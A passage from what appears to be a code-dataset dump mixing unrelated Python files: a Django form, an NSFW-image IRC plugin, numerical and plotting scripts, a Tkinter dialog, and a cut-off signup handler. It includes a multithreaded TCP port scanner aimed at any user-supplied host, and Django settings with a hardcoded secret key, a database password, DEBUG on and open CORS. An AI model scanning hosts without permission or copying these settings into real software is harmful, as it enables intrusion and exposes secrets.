self.cleaned_data['brand_name']\n try:\n check = data.lower()\n same = Brand.objects.get(brand_name = check)\n except:\n return data\n raise ValidationError('This Brand is added already')","sub_path":"pasal/staff/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513447525","text":"\"\"\"\nPlugin which tries to detect NSFW image URLs.\n\nRequirements:\n\n* Pillow\n* requests\n* jpeg decoder for PIL (libjpeg-dev package on Ubuntu)\n\"\"\"\n\nimport os\nimport uuid\nimport tempfile\nimport regex\nfrom os.path import join as pjoin\n\nimport requests\nfrom PIL import Image\n\nfrom base import BotPlugin\n\n__all__ = ('NSFWImageDetectorPlugin')\n\nIMAGE_EXTENSIONS = [\n '.png',\n '.jpg',\n '.gif',\n]\n\nCHUNK_SIZE = 1024\n\nSKIN_PERCENTAGE_THRESHOLD = 30\n\n\nclass NSFWImageDetectorPlugin(BotPlugin):\n\n name = 'NSFW Image Detector'\n description = ('Scans image URLs for potential NSFW images and warns '\n 'users about them')\n\n def __init__(self, bot):\n super(NSFWImageDetectorPlugin, self).__init__(bot=bot)\n self._images_dir = tempfile.mkdtemp(suffix='nsfw-images')\n\n def handle_message(self, channel, nick, msg, line=None):\n urls = regex.WEB_URL.findall(msg)\n\n if not urls:\n return\n\n image_urls = self._get_image_urls(urls)\n\n if not image_urls:\n return\n\n nsfw_image_urls = self._process_images(urls=image_urls)\n\n for url in nsfw_image_urls:\n from response import NSFW_LINKS, random_response\n msg = random_response(NSFW_LINKS) % {'url': url, 'nick': nick}\n self.bot.say(msg, channel)\n\n def _process_images(self, urls):\n \"\"\"\n Download all the images and return links which include potentially NSFW\n content.\n \"\"\"\n nsfw_urls = []\n\n for url in urls:\n file_path = self._download_image(url=url)\n\n if file_path and os.path.isfile(file_path):\n try:\n is_nsfw = self._is_nsfw_image(file_path=file_path)\n\n if is_nsfw:\n nsfw_urls.append(url)\n finally:\n os.remove(file_path)\n\n return nsfw_urls\n\n def _is_nsfw_image(self, file_path):\n \"\"\"\n Detect if the provided image file is NSFW.\n\n Current version of this function is very simple and only detects very\n basic nudity by measuring skin tone percentage in the image.\n \"\"\"\n skin_percent = self._get_skin_ratio_percentage(file_path)\n return skin_percent > SKIN_PERCENTAGE_THRESHOLD\n\n def _get_skin_ratio_percentage(self, file_path):\n try:\n im = Image.open(file_path)\n except Exception:\n self.bot.log_error('Could not open NSFW image: \"'\n + file_path + '\"')\n return 0.0\n\n im = im.convert('RGB')\n\n im = im.crop((int(im.size[0] * 0.2), int(im.size[1] * 0.2),\n im.size[0] - int(im.size[0] * 0.2),\n im.size[1] - int(im.size[1] * 0.2)))\n\n colors = im.getcolors(im.size[0] * im.size[1])\n\n skin = sum(count for count, rgb in colors if rgb[0] > 60\n and rgb[1] < (rgb[0] * 0.85) and rgb[1] < (rgb[0] * 0.70)\n and rgb[1] > (rgb[0] * 0.40) and rgb[1] > (rgb[0] * 0.20))\n\n percentage = float(skin) / float(im.size[0] * im.size[1])\n percentage = percentage * 100\n return percentage\n\n def _get_image_urls(self, urls):\n \"\"\"\n Filter urls to returns only image urls.\n\n Contains url transformers for a few common image sharers.\n \"\"\"\n if not urls:\n return\n\n image_urls = []\n for url in urls:\n # Rewrite imgur urls\n imgur_res = regex.IMGUR.search(url)\n if imgur_res:\n url = \"https://i.imgur.com/\" + imgur_res.group('id') + \".jpg\"\n\n if self._is_image_url(url=url):\n image_urls.append(url)\n\n return image_urls\n\n @staticmethod\n def _is_image_url(url):\n # Very simple logic, doesn't support urls which don't have an extension\n url = url.lower()\n extension = os.path.splitext(url)[1]\n\n return extension in IMAGE_EXTENSIONS\n\n def _download_image(self, url):\n \"\"\"Download image in a temporary directory and return its path.\"\"\"\n try:\n extension = os.path.splitext(url)[1]\n response = requests.get(url, stream=True)\n except Exception:\n self.bot.log_error('Failed to download NSFW image: \"'\n + url + '\"')\n return\n\n if not response.status_code == 200:\n return\n\n name = str(uuid.uuid4()) + extension\n file_path = pjoin(self._images_dir, name)\n\n first_chunk = True\n with open(file_path, 'wb') as fp:\n for chunk in response.iter_content(CHUNK_SIZE):\n if first_chunk:\n first_chunk = False\n if not self._is_image(chunk):\n self.bot.log_error('NSFW image was not an image: \"'\n + url + '\"')\n return\n\n fp.write(chunk)\n\n return file_path\n\n # From http://people.iola.dk/olau/python/imagedetect.py by Ole Laursen\n @staticmethod\n def _is_jpg(data):\n \"\"\"Return True if data is the first 2 bytes of a JPEG file.\"\"\"\n return data[:2] == '\\xff\\xd8'\n\n @staticmethod\n def _is_png(data):\n \"\"\"Return True if data is the first 8 bytes of a PNG file.\"\"\"\n return data[:8] == '\\x89PNG\\x0d\\x0a\\x1a\\x0a'\n\n @staticmethod\n def _is_gif(data):\n \"\"\"Return True if data is the first 4 bytes of a GIF file.\"\"\"\n return data[:4] == 'GIF8'\n\n def _is_image(self, data):\n \"\"\"Return True if data conforms to a magic number of an image file.\"\"\"\n return self._is_jpg(data) or self._is_png(data) or self._is_gif(data)\n","sub_path":"src/plugins/nsfw_image_detector.py","file_name":"nsfw_image_detector.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"189988406","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 22 20:37:58 2019\n\n@author: billy\n\"\"\"\n\nimport numpy as np\n\nimport plots\n\nfrom NumericalSolvers import RK,EF,TZ\n\n\nprint('------ begin of code ------')\n\n\n## boundary conditions\n\n# time starting point \nt0=0\n\n#time ending point\ntE=365\n\n#step time\ndt=0.1\n\n\n# initial conditions\n\n#creating the initial w matrix\n\nw0=np.block([\n [0.12],\n [0.001],\n ])\n\n\n\n## the first step \n## the starting point for the total data matrix w\nw=w0\n\n## the starting point for the time vector Time\nTime=[t0]\n\n\n##----------- The excecution --------------\nwhile(Time[-1]', self.btn_func)\n bu.pack(side=tk.LEFT)\n self.buframe.pack(side=tk.TOP)\n self.flagframe = tk.LabelFrame(self,text='')\n j = -1\n for flag in self.flags :\n self.fVar.append(tk.IntVar())\n j += 1\n self.fVar[j].set(fVal[j])\n fl = tk.Checkbutton(self.flagframe,text=flag, variable=self.fVar[j])\n self.fBtn.append(fl)\n if fVis[j] : fl.pack(side=tk.LEFT)\n self.flagframe.pack(side=tk.TOP)\n self.transient(self.master)\n self.wait_visibility()\n self.grab_set()\n self.focus_set()\n\n def btn_func(self,event):\n btn = event.widget\n r = btn['text'] + ';' + str(self.fVar[0].get()) + ';' + str(self.fVar[1].get())\n self.var.set(r)\n self.destroy()\n\n\ndef ask_dir_content(dir):\n if dir[-1] != '/': dir = dir + '/'\n dir_cnt =0\n file_cnt =0\n files = os.listdir(dir)\n for f in files:\n #print(dir+f)\n if os.path.isdir(dir + f):\n dir_cnt += 1\n else:\n file_cnt += 1\n if dir_cnt + file_cnt == 0:\n return 'empty'\n else:\n return 'Dir/File: '+str(dir_cnt)+'/'+str(file_cnt)\n\ndef get_askbox_result(win,var,qtext,butt):\n AskBox = AskBoxM(master=win, bg='blue', qt=qtext, var=var, btns=butt)\n AskBox.geometry('400x120+150+100')\n AskBox.wait_window()\n r = var.get()\n return r\n\ndef get_askbox_answer(win,var,qtext,butt,bg='blue'):\n AskBox = AskBoxM(master=win, bg=bg, qt=qtext, var=var, btns=butt)\n wx = win.winfo_rootx()+20\n wy = win.winfo_rooty()+70\n AskBox.geometry('400x120+{}+{}'.format(wx,wy))\n AskBox.wait_window()\n r = var.get()\n return r\n\ndef ask_confirm(win,var,qtext):\n AskBox = AskBoxM(master=win, bg='blue', qt=qtext,\n var=var, btns=['Yes','No'], fVis=(False,False))\n wx = win.winfo_rootx()+20\n wy = win.winfo_rooty()+70\n AskBox.geometry('400x100+{}+{}'.format(wx,wy))\n AskBox.title('Confirm')\n AskBox.wait_window()\n r = var.get()\n ans,mult,trash = r.split(';')\n return ans\n\ndef show_info(win,qtext):\n var = tk.StringVar()\n AskBox = AskBoxM(master=win, bg='blue', qt=qtext, var=var,\n btns=['OK'], fVis=(False,False))\n wx = win.winfo_rootx()+20\n wy = win.winfo_rooty()+70\n AskBox.geometry('400x100+{}+{}'.format(wx,wy))\n AskBox.title('Info')\n AskBox.wait_window()\n return 'OK'\n\n\nif __name__ == '__main__':\n\n mainW = 800\n mainH = 300\n smX = 100\n smY = 30\n main_geo = ('{}x{}+{}+{}'.format(mainW, mainH,smX,smY))\n\n root = tk.Tk()\n root.geometry(main_geo)\n root.title('AskBoxM Testing')\n SomeVar = tk.StringVar()\n\n fgroup = ['file01','file02','file03','file04','file05','file06','file07',\n 'file08','file09','file10']\n\n def ask():\n global SomeVar\n qt = qText.get('1.0',tk.END)\n r = get_askbox_result(root,SomeVar,qt,['Yes','Cancel'])\n print('r=',r)\n\n def imitate_filegroup_deleting():\n global SomeVar, fgroup\n fg = fgroup\n max = len(fg)\n j = 0\n ask_flag = True\n for fn in fg:\n j += 1\n cnt = 'Cnt : '+str(j)+' / '+str(max)\n qt = cnt + '\\nУдалить файл \"'+fn+'\" ?'\n if ask_flag :\n Ab = AskBoxM(master=root, bg='blue', qt=qt, var=SomeVar,\n btns=['Yes', 'No', 'Skip', 'Cancel'],\n fVis=(True, True), fVal=(0, 1))\n Ab.geometry('350x100+150+100')\n Ab.wait_window()\n r = SomeVar.get()\n print('r=', r)\n cmd, noask, trash = r.split(';')\n print(cmd, noask, trash)\n noask = int(noask)\n trash = int(trash)\n if noask : ask_flag =False\n else :\n print(cnt, fn)\n\n\n qText = tk.Text(root, fg='black', height=6)\n qText.insert(tk.INSERT, 'Удалить указанный файл ?')\n qText.pack_propagate(False)\n qText.pack(side=tk.TOP, fill=tk.X)\n bu = tk.Button(root,text='Ask',command=ask).pack()\n buDel = tk.Button(root,text='GroupDelete', command=imitate_filegroup_deleting).pack()\n\n root.mainloop()\n\n\n\n","sub_path":"AskBox.py","file_name":"AskBox.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"287137905","text":"from matplotlib import cm, rcParams\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math as math\nimport random as rand\nimport os\nimport csv\nimport argparse\n\n# TO DO : Rewrite this code to make it more readable.\n# USAGE : Run in terminal \"python auto_to_py.py bif_points_1.dat bif_points_2.dat bif_points_3.dat\"\n\nplt.rcParams['axes.xmargin'] = 0\n\np = argparse.ArgumentParser()\np.add_argument('files', type=str, nargs='*')\nargs = p.parse_args()\n\ndef row_count(filename):\n with open(filename) as in_file:\n return sum(1 for _ in in_file)\n\nc = ['#B5EAD7', '#C7CEEA']\ns = ['-', '--']\n\nI = [[]]\nphi = [[]]\nstability = []\n\nfor filename in args.files :\n with open(filename, newline='') as file:\n datareader = csv.reader(file, delimiter=' ')\n\n last_line_nb = row_count(filename)\n\n last_I = -999\n last_phi = -999\n last_stability = 0\n\n # seperate into sublists by checking if two consecutive values are duplicates\n for row in datareader:\n\n # the 2nd condition avoids a list with one value when two consecutive values are duplicates\n if last_I == float(row[0]) and len(I[-1]) > 1 :\n if last_stability != int(row[3]):\n I[-1].append(last_I)\n phi[-1].append(last_phi)\n I.append([])\n phi.append([])\n if last_stability != 0 :\n stability.append(last_stability)\n\n if last_I != -999 :\n I[-1].append(last_I)\n phi[-1].append(last_phi)\n\n if last_stability != int(row[3]) and len(I[-1]) > 1:\n I.append([])\n phi.append([])\n if last_stability != 0 :\n stability.append(last_stability)\n\n # if at last line, then stop checking for consecutive values and just add the remaining data\n if last_line_nb == datareader.line_num:\n I[-1].append(float(row[0]))\n phi[-1].append(float(row[1]))\n stability.append(int(row[3]))\n\n last_I = float(row[0])\n last_phi = float(row[1])\n last_stability = int(row[3])\n\n# regime delimiter to make things more visual\nplt.axvspan(1, 1.25925, facecolor='0.2', alpha=0.1)\n\nfor k in range(len(I)) :\n if stability[k] == 1 :\n plt.plot(I[k], phi[k], color='black', linestyle=s[stability[k]-1], label='stable')\n if stability[k] == 2 :\n plt.plot(I[k], phi[k], color='black', linestyle=s[stability[k]-1], label='unstable')\n\nplt.title('Bifurcation diagram for two weakly coupled neurons, $\\\\beta =0.2$', fontsize=11)\nplt.xlabel('Current $I$', fontsize=10.5)\nplt.ylabel('Phase Difference $\\phi$', fontsize=10.5)\n\n# remove duplicate legend\nhandles, labels = plt.gca().get_legend_handles_labels()\nby_label = dict(zip(labels, handles))\nplt.legend(by_label.values(), by_label.keys(), loc='upper right', bbox_to_anchor=(1, 0.95))\n\nplt.savefig('bif_diagram_beta=0.2.svg')\n#plt.show()\n","sub_path":"bif_weak_coupling/beta=0.2/auto_to_py.py","file_name":"auto_to_py.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"400763633","text":"#!/usr/bin/env python\r\nimport socket\r\nimport subprocess\r\nimport sys\r\nimport netaddr\r\nfrom datetime import datetime\r\nfrom multiprocessing.dummy import Pool as ThreadPool\r\n\r\n# Ask for input\r\nremoteServer = input(\"Enter a remote host to scan: \")\r\nremoteServerIP = socket.gethostbyname(remoteServer)\r\n\r\n# Make the Pool of workers\r\npool = ThreadPool(512)\r\n\r\n# Print a nice banner with information on which host we are about to scan\r\nprint (\"-\" * 60)\r\nprint (\"Please wait, scanning remote host\", remoteServerIP)\r\nprint (\"-\" * 60)\r\n\r\n# Check what time the scan started\r\nt1 = datetime.now()\r\n\r\n\r\n\r\n# Using the range function to specify ports (here it will scans all ports between 1 and 1024)\r\n\r\n# We also put in some error handling for catching errors\r\n\r\ndef pscan(port):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n result = sock.connect_ex((remoteServerIP, port))\r\n if result == 0:\r\n print (\"Port {}: \t Open\".format(port))\r\n sock.close()\r\n return\r\n\r\nresults = pool.map(pscan,range(1,1025))\r\n\r\n\r\n#excepts\r\n\r\n# Checking the time again\r\nt2 = datetime.now()\r\n\r\n# Calculates the difference of time, to see how long it took to run the script\r\ntotal = t2 - t1\r\n\r\n# Printing the information to screen\r\nprint ('Scanning Completed in: ', total)\r\n","sub_path":"portscanner_multi.py","file_name":"portscanner_multi.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"62782512","text":"import os\nimport datetime\nfrom pathlib import Path\nfrom celery.schedules import crontab\n# from environ import Env\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\n# ENV = Env()\n# TEMP_DIRECTORY = \"/tmp\"\n# BASE_DIR = Path(__file__).resolve().parent.parent\nSITE_URL = \"http://localhost:8000\"\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'qcss(9#e6wch%rq2zk8i89d3y=h9-#gt@b@g=69zzj#q_pf!(k'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS=['*']\n\nMINIMUM_RESOLUTIONS_TO_ENCODE = [240, 360]\n# FFMPEG_PATH = 'ffmpeg'\n# FFMPEG_PATH = ENV.str(\"FFMPEG_PATH\", \"ffmpeg\")\n# FFPROBE_PATH = ENV.str(\"FFPROBE_PATH\", \"ffprobe\")\n\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_CREDENTIALS = True\n\n# AUTH_USER_MODEL = 'authentication.User'\nAUTH_USER_MODEL = 'users.User'\n# Application definition\n\nLIKES_MODELS = {\n \"posts.Post\": {\n 'serializer': 'posts.serializers.PostSerializer'\n },\n \"albums.Album\": {\n 'serializer': 'albums.serializers.AlbumsSerializer'\n },\n \"tracks.Track\": {\n 'serializer': 'tracks.serializers.TrackSerializer'\n },\n}\n\nLOCAL_APPS = [\n # 'authentication',\n # 'auth',\n 'users',\n 'posts',\n 'videos',\n 'photos',\n 'likes',\n 'comments',\n 'artists',\n 'tracks',\n 'playlists',\n 'albums',\n 'images',\n\n 'uploader',\n # 'media',\n 'encoding',\n 'litloop_project',\n # 'videos.apps.VideosConfig',\n 'actions.apps.ActionsConfig',\n # 'uploader.apps.UploaderConfig',\n\n # 'authentication.apps.AuthenticationConfig',\n # 'users.apps.UsersConfig',\n # 'posts.apps.PostsConfig',\n # 'likes.apps.LikesConfig',\n # 'tracks.apps.TracksConfig',\n # 'albums.apps.AlbumsConfig',\n # 'artists.apps.ArtistsConfig',\n # 'images.apps.ImagesConfig',\n # 'uploader.apps.UploaderConfig',\n # 'media.apps.MediaConfig',\n]\n\nTHIRD_PARTY_APPS = [\n # \"allauth\",\n # \"allauth.account\",\n # \"allauth.socialaccount\",\n 'rest_framework',\n 'corsheaders',\n 'django_extensions',\n 'drf_yasg',\n 'mptt',\n 'spotipy',\n]\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n *THIRD_PARTY_APPS,\n *LOCAL_APPS,\n\n]\n\nSITE_ID = 1\n\nSWAGGER_SETTINGS = {\n 'SECURITY_DEFINITIONS': {\n 'Bearer': {\n 'type': 'apiKey',\n 'name': 'Authorization',\n 'in': 'header',\n }\n }\n}\n\n\n\nMIDDLEWARE = [\n # 'litloop_project.CorsMiddleware',\n # 'litloop_project.middleware.cors.CorsMiddleware',\n 'litloop_project.middleware.corss.CorsMiddleware',\n\n # 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n # 'corsheaders.middleware.CorsMiddleware',\n]\n\nROOT_URLCONF = 'litloop_project.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # 'DIRS': [],\n # 'DIRS': [\n # BASE_DIR + '/templates/',\n # ],\n \"DIRS\": [\"templates\"],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'litloop_project.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'postgres',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n 'HOST': '127.0.0.1',\n 'PORT': '5432'\n }\n}\n\n\nMEDIA_IS_REVIEWED = True\nPORTAL_WORKFLOW = \"private\"\n\nREST_FRAMEWORK = {\n 'NON_FIELD_ERRORS_KEY': 'error',\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n 'DEFAULT_RENDERER_CLASSES': [\n 'rest_framework.renderers.JSONRenderer',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n ],\n # 'DEFAULT_PARSER_CLASSES': (\n # 'rest_framework.parsers.JSONParser',\n # )\n # 'DEFAULT_PAGINATION_CLASS':\n # 'tracks.pagination.CustomPagination'\n # 'artcograph_dev.apps.tracks.pagination.CustomPagination'\n}\n\n# REST_FRAMEWORK = {\n# 'DEFAULT_PAGINATION_CLASS':\n# '.pagination.CustomPagination'\n# }\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': datetime.timedelta(days=365),\n 'REFRESH_TOKEN_LIFETIME': datetime.timedelta(days=1),\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\n\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nDEFAULT_AUTO_FIELD='django.db.models.AutoField'\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nSTATIC_URL = '/static/'\nFRIENDLY_TOKEN_LEN = 11\nFRIENDLY_COMMENT_TOKEN_LEN = 26\n\n\n\nMASK_IPS_FOR_ACTIONS = True\n# how many seconds a process in running state without reporting progress is\n# considered as stale...unfortunately v9 seems to not include time\n# some times so raising this high\nRUNNING_STATE_STALE = 60 * 60 * 2\n\n# FRIENDLY_TOKEN_LEN = 9\n\nX_FRAME_OPTIONS = \"ALLOWALL\"\n\n\nEMAIL_BACKEND = \"djcelery_email.backends.CeleryEmailBackend\"\nCELERY_EMAIL_TASK_CONFIG = {\n \"queue\": \"short_tasks\",\n}\n\nPOST_UPLOAD_AUTHOR_MESSAGE_UNLISTED_NO_COMMENTARY = \"\"\n# a message to be shown on the author of a media file and only\n# only in case where unlisted workflow is used and no commentary\n# exists\n\nCANNOT_ADD_MEDIA_MESSAGE = \"\"\n\n# mp4hls command, part of Bendo4\nMP4HLS_COMMAND = \"/home/mediacms.io/mediacms/Bento4-SDK-1-6-0-637.x86_64-unknown-linux/bin/mp4hls\"\n\n\n# EMAIL_BACKEND = 'django.core.email.backends.smtp.EmailBackend'\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = 587\nEMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD')\n\n\nREDIS_LOCATION = \"redis://127.0.0.1:6379/1\"\n# CELERY_RESULT_BACKEND = 'redis://localhost:6379'\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": REDIS_LOCATION,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n }\n}\n\nREDIS_CACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.redis.RedisCache\",\n \"LOCATION\": \"redis://127.0.0.1:6379\",\n }\n}\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\nSESSION_CACHE_ALIAS = \"default\"\n\n\n# TODO: beat, delete chunks from media root\n# chunks_dir after xx days...(also uploads_dir)\n\n\nLOCAL_INSTALL = False\n\n# this is an option to make the whole portal available to logged in users only\n# it is placed here so it can be overrided on local_settings.py\nGLOBAL_LOGIN_REQUIRED = False\n\n# TODO: separate settings on production/development more properly, for now\n# this should be ok\nCELERY_TASK_ALWAYS_EAGER = False\nif os.environ.get(\"TESTING\"):\n CELERY_TASK_ALWAYS_EAGER = True\n\n\n# OAuth PROVIDERS\n# GOOGLE_CLIENT_ID =\n# GOOGLE_CLIENT_SECRET =\n#\n# APPLE_CLIENT_ID =\n# APPLE_CLIENT_SECRET =\n#\n# TWITTER_CLIENT_ID =\n# TWITTER_CLIENT_SECRET =\n#\n# SPOTIFY_CLIENT_ID =\n# SPOTIFY_CLIENT_SECRET =\n#\n\n\nfrom litloop_project.settings.aws import * # noqa\nfrom litloop_project.settings.celery import * # noqa\nfrom litloop_project.settings.email import * # noqa\nfrom litloop_project.settings.ffmpeg import * # noqa\nfrom litloop_project.settings.session import * # noqa\n","sub_path":"litloop_project/django/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532583829","text":"# 제곱근 사용을 위한 sqrt 함수\nfrom math import sqrt\n\n\n# 두 매장의 직선 거리를 계산해 주는 함수\ndef distance(store1, store2):\n return sqrt((store1[0] - store2[0]) ** 2 + (store1[1] - store2[1]) ** 2)\n\n\n# 가장 가까운 두 매장을 찾아주는 함수\ndef closest_pair(coordinates):\n # 여기 코드를 쓰세요\n shortest = distance(coordinates[0], coordinates[1])\n for pair1 in coordinates:\n for pair2 in coordinates:\n if pair1 == pair2:\n continue\n if shortest > distance(pair1, pair2):\n shortest = distance(pair1, pair2)\n temp1 = pair1\n temp2 = pair2\n answer = [temp1, temp2]\n return answer\n\n\n# 테스트\ntest_coordinates = [(2, 3), (12, 30), (40, 50), (5, 1), (12, 10), (3, 4)]\nprint(closest_pair(test_coordinates))\n","sub_path":"codeit/closest_pair/closest_pair.py","file_name":"closest_pair.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"46513370","text":"def post(self):\n post_keys = ['user_first',\n 'user_last',\n 'user_middle',\n 'user_dob',\n 'user_rep_id',\n 'user_email',\n 'user_phone',\n 'user_postal',\n 'user_address',\n 'user_city',\n 'user_state',\n 'user_identification_type',\n 'dl_state',\n 'identification_expiration',\n 'user_identification_number',\n 'user_password',\n 'user_password_confirm',\n 'user_ss',\n 'user_primary_state',\n 'user_status',\n 'user_business',\n 'user_business_type',\n 'user_business_tax',\n 'user_business_ein',\n 'user_office',\n 'user_type',\n 'confirm_code',\n 'recruiter_rep_id',\n 'comp_path',\n 'user-signature']\n\n new_pending_user = {}\n for item in post_keys:\n new_pending_user[item] = self.request.get(item)\n new_pending_user[\"identifier\"] = Helpers.guid()\n self.response.out.write(\"registering\")\n kv = KeyValueStoreItem(\n identifier=Helpers.guid(),\n keyy=\"new_user_registration_\" + new_pending_user[\"identifier\"],\n val=json.dumps(new_pending_user),\n expiration=Helpers.pacific_now() + timedelta(days=7)\n )\n kv.put()\n self.redirect(\"/sign/\" + new_pending_user[\"identifier\"])\n return\n\n import StringIO\n from PIL import Image, ImageDraw, ImageFont\n from io import BytesIO\n from PyPDF2 import PdfFileWriter,PdfFileReader\n import base64\n\n #validate the form\n good = True\n if self.request.get(\"user_password\") != self.request.get(\"user_password_confirm\"):\n good = False\n if len(self.request.get(\"user_password\").strip()) < 3:\n good = False\n if self.request.get(\"user_office\") == \"N/A\" or self.request.get(\"user_office\").strip() == \"\":\n good = False\n if self.request.get(\"user_type\") == \"N/A\" or self.request.get(\"user_type\").strip() == \"\":\n good = False\n\n if good:\n email = self.request.get(\"user_email\").lower()\n user_rep_id = self.request.get(\"user_rep_id\").upper()\n new_id = Helpers.guid()\n\n found_users_email = False\n reps = FieldApplicationUser.query(FieldApplicationUser.rep_email == email)\n for rep in reps:\n found_users_email = True\n if found_users_email:\n self.response.out.write(\"User already exists.\")\n else:\n found_users_rep_id = False\n reps2 = FieldApplicationUser.query(FieldApplicationUser.rep_id == user_rep_id)\n ascii_offset = -1\n for rep2 in reps2:\n found_users_rep_id = True\n ascii_offset += 1\n\n if found_users_rep_id:\n user_rep_id += chr(ascii_offset + 65)\n\n allowed_offises = []\n new_user = FieldApplicationUser(\n identifier=new_id,\n first_name=(self.request.get(\"user_first\")[0].upper() + self.request.get(\"user_first\")[1:]).strip(),\n last_name=(self.request.get(\"user_last\")[0].upper() + self.request.get(\"user_last\")[1:]).strip(),\n main_office=self.request.get(\"user_office\"),\n rep_id=user_rep_id,\n rep_email=email,\n rep_phone=self.request.get(\"user_phone\"),\n user_type=self.request.get(\"user_type\"),\n password=Helpers.hash_pass(self.request.get(\"user_password\")),\n payscale_key=\"n/a\",\n sales_rabbit_id=-1,\n current_status=-1,\n recruiter_rep_id=self.request.get(\"recruiter_rep_id\"),\n automatic_override_designee=self.request.get(\"recruiter_rep_id\"),\n automatic_override_amount=10.0,\n automatic_override_enabled=True\n )\n\n recruiter_rep_id = new_user.recruiter_rep_id\n #exceptions for the Shaffer's\n if new_user.recruiter_rep_id in [\"SHAF0420\", \"SHAF1021\", \"SHAF0920\"]:\n new_user.recruiter_rep_id = \"AZ0230\"\n new_user.automatic_override_designee = \"AZ0230\"\n new_user.automatic_override_amount = 0.0\n new_user.automatic_override_enabled=False\n\n if new_user.recruiter_rep_id in [\"VAND0127\", \"COLL0910\"]:\n new_user.automatic_override_amount = 0.0\n new_user.automatic_override_enabled=False\n\n user_type = new_user.user_type\n count = 0\n while count < int(new_user.user_type == \"survey\"):\n allowed_offises.append(new_user.main_office)\n count +=1\n\n new_user.allowed_offices = json.dumps(allowed_offises)\n\n today = Helpers.pacific_today()\n yr = str(today.year)\n mth = str(today.month)\n dy = str(today.day)\n\n if len(mth) == 1:\n mth = \"0\" + mth\n\n if len(dy) == 1:\n dy = \"0\" + dy\n\n user_date = mth + \"/\" + dy + \"/\" + yr\n\n first_name=self.request.get(\"user_first\")[0].upper() + self.request.get(\"user_first\")[1:]\n last_name=self.request.get(\"user_last\")[0].upper() + self.request.get(\"user_last\")[1:]\n full_name=first_name+' '+last_name\n address_1=self.request.get(\"user_address\")\n address_2=self.request.get(\"user_city\")+' '+self.request.get(\"user_state\")+', '+self.request.get(\"user_postal\")\n city=self.request.get(\"user_city\")\n state=self.request.get(\"user_state\")\n postal_code=self.request.get(\"user_postal\")\n phone=self.request.get(\"user_phone\")\n user_dob=self.request.get(\"user_dob\").replace(\"-\", \"/\")\n user_sig=self.request.get(\"user-signature\").replace(\"data:image/png;base64,\", 